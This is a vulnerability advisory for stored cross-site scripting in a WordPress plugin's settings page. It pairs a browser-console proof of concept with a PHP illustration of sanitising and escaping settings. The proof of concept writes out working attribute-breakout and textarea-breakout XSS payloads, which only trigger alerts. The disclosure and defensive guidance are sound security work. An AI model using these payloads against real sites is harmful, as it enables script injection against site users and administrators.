Description: The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup).
1. Go to https://example.com/wp-admin/admin.php?page=optik
2. In the browser console, run the code:
```javascript
// Set every text input in the settings form to an attribute-breakout payload
let inputs = document.querySelectorAll( '#wpbody-content input[type="text"]' );
inputs.forEach( (element) => element.value=`" style=animation-name:rotation onanimationstart=alert(/XSS: ${element.name}/)//` );

// Set every textarea in the settings form to a </textarea>-breakout payload
let textareas = document.querySelectorAll( '#wpbody-content textarea' );
textareas.forEach( (element) => element.value=`</textarea><script>alert(/XSS: ${element.name}/)</script>` );
```
3. Save the settings.
4. Reload the page: multiple XSS alerts are shown, one per affected field.
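The two controls the advisory says are missing, shown as an added illustration rather than the plugin's own code: sanitise each setting on save through a register_setting() callback, and escape each value for the exact HTML context on output. The option name, field names and settings group below are hypothetical; this is the pattern, not the plugin's fix.

```php
<?php
// Added illustration of sanitising and escaping WordPress plugin settings.
// Not the plugin's own code; option/field names are hypothetical.

// 1. Sanitise on save. register_setting() runs this callback on every update,
//    whether or not the current user holds the unfiltered_html capability.
function example_sanitize_settings( $input ) {
    $clean = array();
    // Single-line field: strips tags and invalid octets, normalises whitespace.
    $clean['title']   = sanitize_text_field( $input['title'] ?? '' );
    // Multi-line field: same as above but keeps newlines.
    $clean['message'] = sanitize_textarea_field( $input['message'] ?? '' );
    return $clean;
}

add_action( 'admin_init', function () {
    register_setting(
        'example_settings_group',   // hypothetical settings group
        'example_settings',         // hypothetical option name
        array(
            'type'              => 'array',
            'sanitize_callback' => 'example_sanitize_settings',
            'default'           => array( 'title' => '', 'message' => '' ),
        )
    );
} );

// 2. Escape on output. Sanitisation alone does not remove a stray double quote,
//    so the attribute-breakout payload in the PoC is stopped here: esc_attr()
//    encodes the quote, and esc_textarea() encodes the '<' of </textarea>.
function example_render_fields() {
    $opts = get_option( 'example_settings', array( 'title' => '', 'message' => '' ) );
    ?>
    <input type="text" name="example_settings[title]"
           value="<?php echo esc_attr( $opts['title'] ); ?>">
    <textarea name="example_settings[message]"><?php echo esc_textarea( $opts['message'] ); ?></textarea>
    <?php
}
```

Each escaping function matches one output context (attribute value vs. textarea body); using esc_html() for an attribute, or no escaping for a textarea, leaves the breakout paths in the PoC open.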